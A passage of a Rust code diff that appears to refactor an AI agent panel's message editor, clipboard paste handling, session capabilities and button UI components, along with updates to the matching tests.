cx.spawn(async move |_, cx| {
let contents = contents.await?;
@@ -639,15 +729,14 @@ impl MessageEditor {
let Some(workspace) = self.workspace.upgrade() else {
return;
};
- let editor_clipboard_selections = cx
- .read_from_clipboard()
- .and_then(|item| item.entries().first().cloned())
- .and_then(|entry| match entry {
+ let editor_clipboard_selections = cx.read_from_clipboard().and_then(|item| {
+ item.entries().iter().find_map(|entry| match entry {
ClipboardEntry::String(text) => {
text.metadata_json::<Vec<editor::ClipboardSelection>>()
}
_ => None,
- });
+ })
+ });
// Insert creases for pasted clipboard selections that:
// 1. Contain exactly one selection
@@ -773,14 +862,12 @@ impl MessageEditor {
// Handle text paste with potential markdown mention links.
// This must be checked BEFORE paste_images_as_context because that function
// returns a task even when there are no images in the clipboard.
- if let Some(clipboard_text) = cx
- .read_from_clipboard()
- .and_then(|item| item.entries().first().cloned())
- .and_then(|entry| match entry {
+ if let Some(clipboard_text) = cx.read_from_clipboard().and_then(|item| {
+ item.entries().iter().find_map(|entry| match entry {
ClipboardEntry::String(text) => Some(text.text().to_string()),
_ => None,
})
- {
+ }) {
if clipboard_text.contains("[@") {
cx.stop_propagation();
let selections_before = self.editor.update(cx, |editor, cx| {
@@ -824,7 +911,7 @@ impl MessageEditor {
}
if !all_mentions.is_empty() {
- let supports_images = self.prompt_capabilities.borrow().image;
+ let supports_images = self.session_capabilities.read().supports_images();
let http_client = workspace.read(cx).client().http_client();
for (anchor, content_len, mention_uri) in all_mentions {
@@ -871,7 +958,20 @@ impl MessageEditor {
}
}
- if self.prompt_capabilities.borrow().image
+ let has_non_text_content = cx
+ .read_from_clipboard()
+ .map(|item| {
+ item.entries().iter().any(|entry| {
+ matches!(
+ entry,
+ ClipboardEntry::Image(_) | ClipboardEntry::ExternalPaths(_)
+ )
+ })
+ })
+ .unwrap_or(false);
+
+ if self.session_capabilities.read().supports_images()
+ && has_non_text_content
&& let Some(task) = paste_images_as_context(
self.editor.clone(),
self.mention_set.clone(),
@@ -880,6 +980,7 @@ impl MessageEditor {
cx,
)
{
+ cx.stop_propagation();
task.detach();
return;
}
@@ -946,7 +1047,7 @@ impl MessageEditor {
cx,
);
});
- let supports_images = self.prompt_capabilities.borrow().image;
+ let supports_images = self.session_capabilities.read().supports_images();
tasks.push(self.mention_set.update(cx, |mention_set, cx| {
mention_set.confirm_mention_completion(
file_name,
@@ -1040,6 +1141,88 @@ impl MessageEditor {
});
}
+ pub fn insert_branch_diff_crease(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ let Some(workspace) = self.workspace.upgrade() else {
+ return;
+ };
+
+ let project = workspace.read(cx).project().clone();
+
+ let Some(repo) = project.read(cx).active_repository(cx) else {
+ return;
+ };
+
+ let default_branch_receiver = repo.update(cx, |repo, _| repo.default_branch(false));
+ let editor = self.editor.clone();
+ let mention_set = self.mention_set.clone();
+ let weak_workspace = self.workspace.clone();
+
+ window
+ .spawn(cx, async move |cx| {
+ let base_ref: SharedString = default_branch_receiver
+ .await
+ .ok()
+ .and_then(|r| r.ok())
+ .flatten()
+ .ok_or_else(|| anyhow!("Could not determine default branch"))?;
+
+ cx.update(|window, cx| {
+ let mention_uri = MentionUri::GitDiff {
+ base_ref: base_ref.to_string(),
+ };
+ let mention_text = mention_uri.as_link().to_string();
+
+ let (excerpt_id, text_anchor, content_len) = editor.update(cx, |editor, cx| {
+ let buffer = editor.buffer().read(cx);
+ let snapshot = buffer.snapshot(cx);
+ let (excerpt_id, _, buffer_snapshot) = snapshot.as_singleton().unwrap();
+ let text_anchor = editor
+ .selections
+ .newest_anchor()
+ .start
+ .text_anchor
+ .bias_left(&buffer_snapshot);
+
+ editor.insert(&mention_text, window, cx);
+ editor.insert(" ", window, cx);
+
+ (excerpt_id, text_anchor, mention_text.len())
+ });
+
+ let Some((crease_id, tx)) = insert_crease_for_mention(
+ excerpt_id,
+ text_anchor,
+ content_len,
+ mention_uri.name().into(),
+ mention_uri.icon_path(cx),
+ mention_uri.tooltip_text(),
+ Some(mention_uri.clone()),
+ Some(weak_workspace),
+ None,
+ editor,
+ window,
+ cx,
+ ) else {
+ return;
+ };
+ drop(tx);
+
+ let confirm_task = mention_set.update(cx, |mention_set, cx| {
+ mention_set.confirm_mention_for_git_diff(base_ref, cx)
+ });
+
+ let mention_task = cx
+ .spawn(async move |_cx| confirm_task.await.map_err(|e| e.to_string()))
+ .shared();
+
+ mention_set.update(cx, |mention_set, _| {
+ mention_set.insert_mention(crease_id, mention_uri, mention_task);
+ });
+ })
+ })
+ .detach_and_log_err(cx);
+ }
+
fn insert_crease_impl(
&mut self,
text: String,
@@ -1078,11 +1261,9 @@ impl MessageEditor {
render: Arc::new({
let title = title.clone();
move |_fold_id, _fold_range, _cx| {
- ButtonLike::new("crease")
- .style(ButtonStyle::Filled)
+ Button::new("crease", title.clone())
.layer(ElevationIndex::ElevatedSurface)
- .child(Icon::new(icon))
- .child(Label::new(title.clone()).single_line())
+ .start_icon(Icon::new(icon))
.into_any_element()
}
}),
@@ -1121,7 +1302,7 @@ impl MessageEditor {
return;
};
let Some(completion) =
- PromptCompletionProvider::<Entity<MessageEditor>>::completion_for_action(
+ PromptCompletionProvider::<MessageEditorCompletionDelegate>::completion_for_action(
PromptContextAction::AddSelections,
anchor..anchor,
self.editor.downgrade(),
@@ -1143,7 +1324,7 @@ impl MessageEditor {
}
pub fn add_images_from_picker(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- if !self.prompt_capabilities.borrow().image {
+ if !self.session_capabilities.read().supports_images() {
return;
}
@@ -1197,7 +1378,12 @@ impl MessageEditor {
continue;
};
- images.push(gpui::Image::from_bytes(format, content));
+ let name: gpui::SharedString = path
+ .file_name()
+ .and_then(|n| n.to_str())
+ .map(|s| gpui::SharedString::from(s.to_owned()))
+ .unwrap_or_else(|| "Image".into());
+ images.push((gpui::Image::from_bytes(format, content), name));
}
crate::mention_set::insert_images_as_context(
@@ -1405,6 +1591,21 @@ impl MessageEditor {
self.editor.read(cx).text(cx)
}
+ pub fn set_cursor_offset(
+ &mut self,
+ offset: usize,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.editor.update(cx, |editor, cx| {
+ let snapshot = editor.buffer().read(cx).snapshot(cx);
+ let offset = snapshot.clip_offset(MultiBufferOffset(offset), text::Bias::Left);
+ editor.change_selections(Default::default(), window, cx, |selections| {
+ selections.select_ranges([offset..offset]);
+ });
+ });
+ }
+
pub fn insert_text(&mut self, text: &str, window: &mut Window, cx: &mut Context<Self>) {
if text.is_empty() {
return;
@@ -1570,7 +1771,7 @@ fn find_matching_bracket(text: &str, open: char, close: char) -> Option<usize> {
#[cfg(test)]
mod tests {
- use std::{cell::RefCell, ops::Range, path::Path, rc::Rc, sync::Arc};
+ use std::{ops::Range, path::Path, sync::Arc};
use acp_thread::MentionUri;
use agent::{ThreadStore, outline};
@@ -1588,6 +1789,7 @@ mod tests {
};
use language_model::LanguageModelRegistry;
use lsp::{CompletionContext, CompletionTriggerKind};
+ use parking_lot::RwLock;
use project::{CompletionIntent, Project, ProjectPath};
use serde_json::json;
@@ -1596,10 +1798,10 @@ mod tests {
use util::{path, paths::PathStyle, rel_path::rel_path};
use workspace::{AppState, Item, MultiWorkspace};
- use crate::completion_provider::{PromptCompletionProviderDelegate, PromptContextType};
+ use crate::completion_provider::PromptContextType;
use crate::{
- connection_view::tests::init_test,
- message_editor::{Mention, MessageEditor, parse_mention_links},
+ conversation_view::tests::init_test,
+ message_editor::{Mention, MessageEditor, SessionCapabilities, parse_mention_links},
};
#[test]
@@ -1707,8 +1909,6 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
let thread_store = None;
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let message_editor = cx.update(|window, cx| {
cx.new(|cx| {
@@ -1716,9 +1916,8 @@ mod tests {
workspace.downgrade(),
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- Default::default(),
+ None,
Default::default(),
"Test Agent".into(),
"Test",
@@ -1814,15 +2013,14 @@ mod tests {
let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
let thread_store = None;
- let prompt_capabilities = Rc::new(RefCell::new(acp::PromptCapabilities::default()));
- // Start with no available commands - simulating Claude which doesn't support slash commands
- let available_commands = Rc::new(RefCell::new(vec![]));
+ let session_capabilities = Arc::new(RwLock::new(SessionCapabilities::new(
+ acp::PromptCapabilities::default(),
+ vec![],
+ )));
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let workspace_handle = workspace.downgrade();
let message_editor = workspace.update_in(cx, |_, window, cx| {
cx.new(|cx| {
@@ -1830,10 +2028,9 @@ mod tests {
workspace_handle.clone(),
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- prompt_capabilities.clone(),
- available_commands.clone(),
+ None,
+ session_capabilities.clone(),
"Claude Agent".into(),
"Test",
EditorMode::AutoHeight {
@@ -1863,7 +2060,9 @@ mod tests {
assert!(error_message.contains("Available commands: none"));
// Now simulate Claude providing its list of available commands (which doesn't include file)
- available_commands.replace(vec![acp::AvailableCommand::new("help", "Get help")]);
+ session_capabilities
+ .write()
+ .set_available_commands(vec![acp::AvailableCommand::new("help", "Get help")]);
// Test that unsupported slash commands trigger an error when we have a list of available commands
editor.update_in(cx, |editor, window, cx| {
@@ -1977,17 +2176,17 @@ mod tests {
let mut cx = VisualTestContext::from_window(window.into(), cx);
let thread_store = None;
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
- let prompt_capabilities = Rc::new(RefCell::new(acp::PromptCapabilities::default()));
- let available_commands = Rc::new(RefCell::new(vec![
- acp::AvailableCommand::new("quick-math", "2 + 2 = 4 - 1 = 3"),
- acp::AvailableCommand::new("say-hello", "Say hello to whoever you want").input(
- acp::AvailableCommandInput::Unstructured(acp::UnstructuredCommandInput::new(
- "<name>",
- )),
- ),
- ]));
+ let session_capabilities = Arc::new(RwLock::new(SessionCapabilities::new(
+ acp::PromptCapabilities::default(),
+ vec![
+ acp::AvailableCommand::new("quick-math", "2 + 2 = 4 - 1 = 3"),
+ acp::AvailableCommand::new("say-hello", "Say hello to whoever you want").input(
+ acp::AvailableCommandInput::Unstructured(acp::UnstructuredCommandInput::new(
+ "<name>",
+ )),
+ ),
+ ],
+ )));
let editor = workspace.update_in(&mut cx, |workspace, window, cx| {
let workspace_handle = cx.weak_entity();
@@ -1996,10 +2195,9 @@ mod tests {
workspace_handle,
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- prompt_capabilities.clone(),
- available_commands.clone(),
+ None,
+ session_capabilities.clone(),
"Test Agent".into(),
"Test",
EditorMode::AutoHeight {
@@ -2212,9 +2410,10 @@ mod tests {
}
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
- let prompt_capabilities = Rc::new(RefCell::new(acp::PromptCapabilities::default()));
+ let session_capabilities = Arc::new(RwLock::new(SessionCapabilities::new(
+ acp::PromptCapabilities::default(),
+ vec![],
+ )));
let (message_editor, editor) = workspace.update_in(&mut cx, |workspace, window, cx| {
let workspace_handle = cx.weak_entity();
@@ -2223,10 +2422,9 @@ mod tests {
workspace_handle,
project.downgrade(),
Some(thread_store),
- history.downgrade(),
None,
- prompt_capabilities.clone(),
- Default::default(),
+ None,
+ session_capabilities.clone(),
"Test Agent".into(),
"Test",
EditorMode::AutoHeight {
@@ -2272,12 +2470,14 @@ mod tests {
editor.set_text("", window, cx);
});
- prompt_capabilities.replace(
- acp::PromptCapabilities::new()
- .image(true)
- .audio(true)
- .embedded_context(true),
- );
+ message_editor.update(&mut cx, |editor, _cx| {
+ editor.session_capabilities.write().set_prompt_capabilities(
+ acp::PromptCapabilities::new()
+ .image(true)
+ .audio(true)
+ .embedded_context(true),
+ );
+ });
cx.simulate_input("Lorem ");
@@ -2708,8 +2908,6 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
let thread_store = Some(cx.new(|cx| ThreadStore::new(cx)));
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let message_editor = cx.update(|window, cx| {
cx.new(|cx| {
@@ -2717,9 +2915,8 @@ mod tests {
workspace.downgrade(),
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- Default::default(),
+ None,
Default::default(),
"Test Agent".into(),
"Test",
@@ -2732,8 +2929,9 @@ mod tests {
);
// Enable embedded context so files are actually included
editor
- .prompt_capabilities
- .replace(acp::PromptCapabilities::new().embedded_context(true));
+ .session_capabilities
+ .write()
+ .set_prompt_capabilities(acp::PromptCapabilities::new().embedded_context(true));
editor
})
});
@@ -2809,8 +3007,6 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
let thread_store = Some(cx.new(|cx| ThreadStore::new(cx)));
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let session_id = acp::SessionId::new("thread-123");
let title = Some("Previous Conversation".into());
@@ -2821,9 +3017,8 @@ mod tests {
workspace.downgrade(),
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- Default::default(),
+ None,
Default::default(),
"Test Agent".into(),
"Test",
@@ -2885,8 +3080,6 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
let thread_store = None;
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let message_editor = cx.update(|window, cx| {
cx.new(|cx| {
@@ -2894,9 +3087,8 @@ mod tests {
workspace.downgrade(),
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- Default::default(),
+ None,
Default::default(),
"Test Agent".into(),
"Test",
@@ -2942,8 +3134,6 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
let thread_store = None;
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let message_editor = cx.update(|window, cx| {
cx.new(|cx| {
@@ -2951,9 +3141,8 @@ mod tests {
workspace.downgrade(),
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- Default::default(),
+ None,
Default::default(),
"Test Agent".into(),
"Test",
@@ -2969,13 +3158,19 @@ mod tests {
message_editor.update(cx, |editor, _cx| {
editor
- .prompt_capabilities
- .replace(acp::PromptCapabilities::new().embedded_context(true));
+ .session_capabilities
+ .write()
+ .set_prompt_capabilities(acp::PromptCapabilities::new().embedded_context(true));
});
let supported_modes = {
let app = cx.app.borrow();
- message_editor.supported_modes(&app)
+ let _ = &app;
+ message_editor
+ .read(&app)
+ .session_capabilities
+ .read()
+ .supported_modes(false)
};
assert!(
@@ -2997,8 +3192,6 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
let thread_store = Some(cx.new(|cx| ThreadStore::new(cx)));
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let message_editor = cx.update(|window, cx| {
cx.new(|cx| {
@@ -3006,9 +3199,8 @@ mod tests {
workspace.downgrade(),
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- Default::default(),
+ None,
Default::default(),
"Test Agent".into(),
"Test",
@@ -3024,13 +3216,19 @@ mod tests {
message_editor.update(cx, |editor, _cx| {
editor
- .prompt_capabilities
- .replace(acp::PromptCapabilities::new().embedded_context(true));
+ .session_capabilities
+ .write()
+ .set_prompt_capabilities(acp::PromptCapabilities::new().embedded_context(true));
});
let supported_modes = {
let app = cx.app.borrow();
- message_editor.supported_modes(&app)
+ let _ = &app;
+ message_editor
+ .read(&app)
+ .session_capabilities
+ .read()
+ .supported_modes(true)
};
assert!(
@@ -3053,8 +3251,6 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
let thread_store = Some(cx.new(|cx| ThreadStore::new(cx)));
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let message_editor = cx.update(|window, cx| {
cx.new(|cx| {
@@ -3062,9 +3258,8 @@ mod tests {
workspace.downgrade(),
project.downgrade(),
thread_store.clone(),
- history.downgrade(),
None,
- Default::default(),
+ None,
Default::default(),
"Test Agent".into(),
"Test",
@@ -3118,8 +3313,6 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
let thread_store = Some(cx.new(|cx| ThreadStore::new(cx)));
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
let (message_editor, editor) = workspace.update_in(cx, |workspace, window, cx| {
let workspace_handle = cx.weak_entity();
@@ -169,10 +169,7 @@ impl Render for ModeSelector {
let trigger_button = Button::new("mode-selector-trigger", current_mode_name)
.label_size(LabelSize::Small)
.color(Color::Muted)
- .icon(icon)
- .icon_size(IconSize::XSmall)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
+ .end_icon(Icon::new(icon).size(IconSize::XSmall).color(Color::Muted))
.disabled(self.setting_mode);
PopoverMenu::new("mode-selector")
@@ -5,7 +5,7 @@ use acp_thread::{AgentModelIcon, AgentModelInfo, AgentModelSelector};
use fs::Fs;
use gpui::{Entity, FocusHandle};
use picker::popover_menu::PickerPopoverMenu;
-use ui::{ButtonLike, PopoverMenuHandle, TintColor, Tooltip, prelude::*};
+use ui::{PopoverMenuHandle, Tooltip, prelude::*};
use crate::ui::ModelSelectorTooltip;
use crate::{ModelSelector, model_selector::acp_model_selector};
@@ -77,10 +77,11 @@ impl Render for ModelSelectorPopover {
PickerPopoverMenu::new(
self.selector.clone(),
- ButtonLike::new("active-model")
- .selected_style(ButtonStyle::Tinted(TintColor::Accent))
+ Button::new("active-model", model_name)
+ .label_size(LabelSize::Small)
+ .color(color)
.when_some(model_icon, |this, icon| {
- this.child(
+ this.start_icon(
match icon {
AgentModelIcon::Path(path) => Icon::from_external_svg(path),
AgentModelIcon::Named(icon_name) => Icon::new(icon_name),
@@ -89,13 +90,7 @@ impl Render for ModelSelectorPopover {
.size(IconSize::XSmall),
)
})
- .child(
- Label::new(model_name)
- .color(color)
- .size(LabelSize::Small)
- .ml_0p5(),
- )
- .child(Icon::new(icon).color(Color::Muted).size(IconSize::XSmall)),
+ .end_icon(Icon::new(icon).color(Color::Muted).size(IconSize::XSmall)),
tooltip,
gpui::Corner::BottomRight,
cx,
@@ -5,8 +5,8 @@ use agent_settings::{
use fs::Fs;
use fuzzy::{StringMatch, StringMatchCandidate, match_strings};
use gpui::{
- Action, AnyElement, App, BackgroundExecutor, Context, DismissEvent, Entity, FocusHandle,
- Focusable, ForegroundExecutor, SharedString, Subscription, Task, Window,
+ Action, AnyElement, AnyView, App, BackgroundExecutor, Context, DismissEvent, Entity,
+ FocusHandle, Focusable, ForegroundExecutor, SharedString, Subscription, Task, Window,
};
use picker::{Picker, PickerDelegate, popover_menu::PickerPopoverMenu};
use settings::{Settings as _, SettingsStore, update_settings_file};
@@ -16,7 +16,7 @@ use std::{
};
use ui::{
DocumentationAside, DocumentationSide, HighlightedLabel, KeyBinding, LabelSize, ListItem,
- ListItemSpacing, PopoverMenuHandle, TintColor, Tooltip, prelude::*,
+ ListItemSpacing, PopoverMenuHandle, Tooltip, prelude::*,
};
/// Trait for types that can provide and manage agent profiles
@@ -177,36 +177,34 @@ impl Render for ProfileSelector {
let trigger_button = Button::new("profile-selector", selected_profile)
.label_size(LabelSize::Small)
.color(Color::Muted)
- .icon(icon)
- .icon_size(IconSize::XSmall)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
- .selected_style(ButtonStyle::Tinted(TintColor::Accent));
+ .end_icon(Icon::new(icon).size(IconSize::XSmall).color(Color::Muted));
+
+ let tooltip: Box<dyn Fn(&mut Window, &mut App) -> AnyView> = Box::new(Tooltip::element({
+ move |_window, cx| {
+ let container = || h_flex().gap_1().justify_between();
+ v_flex()
+ .gap_1()
+ .child(
+ container()
+ .child(Label::new("Change Profile"))
+ .child(KeyBinding::for_action(&ToggleProfileSelector, cx)),
+ )
+ .child(
+ container()
+ .pt_1()
+ .border_t_1()
+ .border_color(cx.theme().colors().border_variant)
+ .child(Label::new("Cycle Through Profiles"))
+ .child(KeyBinding::for_action(&CycleModeSelector, cx)),
+ )
+ .into_any()
+ }
+ }));
PickerPopoverMenu::new(
picker,
trigger_button,
- Tooltip::element({
- move |_window, cx| {
- let container = || h_flex().gap_1().justify_between();
- v_flex()
- .gap_1()
- .child(
- container()
- .child(Label::new("Change Profile"))
- .child(KeyBinding::for_action(&ToggleProfileSelector, cx)),
- )
- .child(
- container()
- .pt_1()
- .border_t_1()
- .border_color(cx.theme().colors().border_variant)
- .child(Label::new("Cycle Through Profiles"))
- .child(KeyBinding::for_action(&CycleModeSelector, cx)),
- )
- .into_any()
- }
- }),
+ tooltip,
gpui::Corner::BottomRight,
cx,
)
@@ -64,7 +64,7 @@ impl TerminalInlineAssistant {
project: WeakEntity<Project>,
thread_store: Entity<ThreadStore>,
prompt_store: Option<Entity<PromptStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
initial_prompt: Option<String>,
window: &mut Window,
cx: &mut App,
@@ -1,7 +1,9 @@
use acp_thread::{AgentConnection, StubAgentConnection};
use agent_client_protocol as acp;
use agent_servers::{AgentServer, AgentServerDelegate};
-use gpui::{Entity, SharedString, Task, TestAppContext, VisualTestContext};
+use gpui::{Entity, Task, TestAppContext, VisualTestContext};
+use project::AgentId;
+use project::Project;
use settings::SettingsStore;
use std::any::Any;
use std::rc::Rc;
@@ -11,11 +13,23 @@ use crate::agent_panel;
pub struct StubAgentServer<C> {
connection: C,
+ agent_id: AgentId,
}
-impl<C> StubAgentServer<C> {
+impl<C> StubAgentServer<C>
+where
+ C: AgentConnection,
+{
pub fn new(connection: C) -> Self {
- Self { connection }
+ Self {
+ connection,
+ agent_id: "Test".into(),
+ }
+ }
+
+ pub fn with_connection_agent_id(mut self) -> Self {
+ self.agent_id = self.connection.agent_id();
+ self
}
}
@@ -37,13 +51,14 @@ where
ui::IconName::Ai
}
- fn name(&self) -> SharedString {
- "Test".into()
+ fn agent_id(&self) -> AgentId {
+ self.agent_id.clone()
}
fn connect(
&self,
_delegate: AgentServerDelegate,
+ _project: Entity<Project>,
_cx: &mut gpui::App,
) -> Task<gpui::Result<Rc<dyn AgentConnection>>> {
Task::ready(Ok(Rc::new(self.connection.clone())))
@@ -80,8 +95,25 @@ pub fn open_thread_with_connection(
cx.run_until_parked();
}
+pub fn open_thread_with_custom_connection<C>(
+ panel: &Entity<AgentPanel>,
+ connection: C,
+ cx: &mut VisualTestContext,
+) where
+ C: 'static + AgentConnection + Send + Clone,
+{
+ panel.update_in(cx, |panel, window, cx| {
+ panel.open_external_thread_with_server(
+ Rc::new(StubAgentServer::new(connection).with_connection_agent_id()),
+ window,
+ cx,
+ );
+ });
+ cx.run_until_parked();
+}
+
pub fn send_message(panel: &Entity<AgentPanel>, cx: &mut VisualTestContext) {
- let thread_view = panel.read_with(cx, |panel, cx| panel.as_active_thread_view(cx).unwrap());
+ let thread_view = panel.read_with(cx, |panel, cx| panel.active_thread_view(cx).unwrap());
let message_editor = thread_view.read_with(cx, |view, _cx| view.message_editor.clone());
message_editor.update_in(cx, |editor, window, cx| {
editor.set_text("Hello", window, cx);
@@ -1191,11 +1191,11 @@ impl TextThreadEditor {
Button::new("show-error", "Error")
.color(Color::Error)
.selected_label_color(Color::Error)
- .selected_icon_color(Color::Error)
- .icon(IconName::XCircle)
- .icon_color(Color::Error)
- .icon_size(IconSize::XSmall)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::XCircle)
+ .size(IconSize::XSmall)
+ .color(Color::Error),
+ )
.tooltip(Tooltip::text("View Details"))
.on_click({
let text_thread = text_thread.clone();
@@ -1761,15 +1761,14 @@ impl TextThreadEditor {
let Some(workspace) = self.workspace.upgrade() else {
return;
};
- let editor_clipboard_selections = cx
- .read_from_clipboard()
- .and_then(|item| item.entries().first().cloned())
- .and_then(|entry| match entry {
+ let editor_clipboard_selections = cx.read_from_clipboard().and_then(|item| {
+ item.entries().iter().find_map(|entry| match entry {
ClipboardEntry::String(text) => {
text.metadata_json::<Vec<editor::ClipboardSelection>>()
}
_ => None,
- });
+ })
+ });
// Insert creases for pasted clipboard selections that:
// 1. Contain exactly one selection
@@ -1801,7 +1800,14 @@ impl TextThreadEditor {
.unwrap_or(false);
if should_insert_creases && let Some(clipboard_item) = cx.read_from_clipboard() {
- if let Some(ClipboardEntry::String(clipboard_text)) = clipboard_item.entries().first() {
+ let clipboard_text = clipboard_item
+ .entries()
+ .iter()
+ .find_map(|entry| match entry {
+ ClipboardEntry::String(s) => Some(s),
+ _ => None,
+ });
+ if let Some(clipboard_text) = clipboard_text {
if let Some(selections) = editor_clipboard_selections {
cx.stop_propagation();
@@ -1872,65 +1878,60 @@ impl TextThreadEditor {
cx.stop_propagation();
- let mut images = if let Some(item) = cx.read_from_clipboard() {
- item.into_entries()
- .filter_map(|entry| {
- if let ClipboardEntry::Image(image) = entry {
- Some(image)
- } else {
- None
- }
- })
- .collect()
- } else {
- Vec::new()
- };
+ let clipboard_item = cx.read_from_clipboard();
- if let Some(paths) = cx.read_from_clipboard() {
- for path in paths
- .into_entries()
- .filter_map(|entry| {
- if let ClipboardEntry::ExternalPaths(paths) = entry {
- Some(paths.paths().to_owned())
- } else {
- None
+ let mut images: Vec<gpui::Image> = Vec::new();
+ let mut paths: Vec<std::path::PathBuf> = Vec::new();
+ let mut metadata: Option<CopyMetadata> = None;
+
+ if let Some(item) = &clipboard_item {
+ for entry in item.entries() {
+ match entry {
+ ClipboardEntry::Image(image) => images.push(image.clone()),
+ ClipboardEntry::ExternalPaths(external) => {
+ paths.extend(external.paths().iter().cloned());
}
- })
- .flatten()
- {
- let Ok(content) = std::fs::read(path) else {
- continue;
- };
- let Ok(format) = image::guess_format(&content) else {
- continue;
- };
- images.push(gpui::Image::from_bytes(
- match format {
- image::ImageFormat::Png => gpui::ImageFormat::Png,
- image::ImageFormat::Jpeg => gpui::ImageFormat::Jpeg,
- image::ImageFormat::WebP => gpui::ImageFormat::Webp,
- image::ImageFormat::Gif => gpui::ImageFormat::Gif,
- image::ImageFormat::Bmp => gpui::ImageFormat::Bmp,
- image::ImageFormat::Tiff => gpui::ImageFormat::Tiff,
- image::ImageFormat::Ico => gpui::ImageFormat::Ico,
- _ => continue,
- },
- content,
- ));
+ ClipboardEntry::String(text) => {
+ if metadata.is_none() {
+ metadata = text.metadata_json::<CopyMetadata>();
+ }
+ }
+ }
}
}
- let metadata = if let Some(item) = cx.read_from_clipboard() {
- item.entries().first().and_then(|entry| {
- if let ClipboardEntry::String(text) = entry {
- text.metadata_json::<CopyMetadata>()
- } else {
- None
- }
- })
- } else {
- None
- };
+ for path in paths {
+ let Ok(content) = std::fs::read(path) else {
+ continue;
+ };
+ let Ok(format) = image::guess_format(&content) else {
+ continue;
+ };
+ images.push(gpui::Image::from_bytes(
+ match format {
+ image::ImageFormat::Png => gpui::ImageFormat::Png,
+ image::ImageFormat::Jpeg => gpui::ImageFormat::Jpeg,
+ image::ImageFormat::WebP => gpui::ImageFormat::Webp,
+ image::ImageFormat::Gif => gpui::ImageFormat::Gif,
+ image::ImageFormat::Bmp => gpui::ImageFormat::Bmp,
+ image::ImageFormat::Tiff => gpui::ImageFormat::Tiff,
+ image::ImageFormat::Ico => gpui::ImageFormat::Ico,
+ _ => continue,
+ },
+ content,
+ ));
+ }
+
+ // Respect entry priority order — if the first entry is text, the source
+ // application considers text the primary content. Discard collected images
+ // so the text-paste branch runs instead.
+ if clipboard_item
+ .as_ref()
+ .and_then(|item| item.entries().first())
+ .is_some_and(|entry| matches!(entry, ClipboardEntry::String(_)))
+ {
+ images.clear();
+ }
if images.is_empty() {
self.editor.update(cx, |editor, cx| {
@@ -2287,20 +2288,11 @@ impl TextThreadEditor {
PickerPopoverMenu::new(
self.language_model_selector.clone(),
- ButtonLike::new("active-model")
- .selected_style(ButtonStyle::Tinted(TintColor::Accent))
- .child(
- h_flex()
- .gap_0p5()
- .child(provider_icon_element)
- .child(
- Label::new(model_name)
- .color(color)
- .size(LabelSize::Small)
- .ml_0p5(),
- )
- .child(Icon::new(icon).color(color).size(IconSize::XSmall)),
- ),
+ Button::new("active-model", model_name)
+ .color(color)
+ .label_size(LabelSize::Small)
+ .start_icon(provider_icon_element)
+ .end_icon(Icon::new(icon).color(color).size(IconSize::XSmall)),
tooltip,
gpui::Corner::BottomRight,
cx,
@@ -116,6 +116,10 @@ impl TextThreadHistory {
this
}
+ pub fn is_empty(&self) -> bool {
+ self.visible_items.is_empty()
+ }
+
fn update_visible_items(&mut self, preserve_selected_item: bool, cx: &mut Context<Self>) {
let entries = self.text_thread_store.update(cx, |store, _| {
store.ordered_text_threads().cloned().collect::<Vec<_>>()
@@ -1,197 +1,56 @@
-use crate::ConnectionView;
-use crate::{AgentPanel, RemoveHistory, RemoveSelectedThread};
use acp_thread::{AgentSessionInfo, AgentSessionList, AgentSessionListRequest, SessionListUpdate};
use agent_client_protocol as acp;
-use chrono::{Datelike as _, Local, NaiveDate, TimeDelta, Utc};
-use editor::{Editor, EditorEvent};
-use fuzzy::StringMatchCandidate;
-use gpui::{
- App, Entity, EventEmitter, FocusHandle, Focusable, ScrollStrategy, Task,
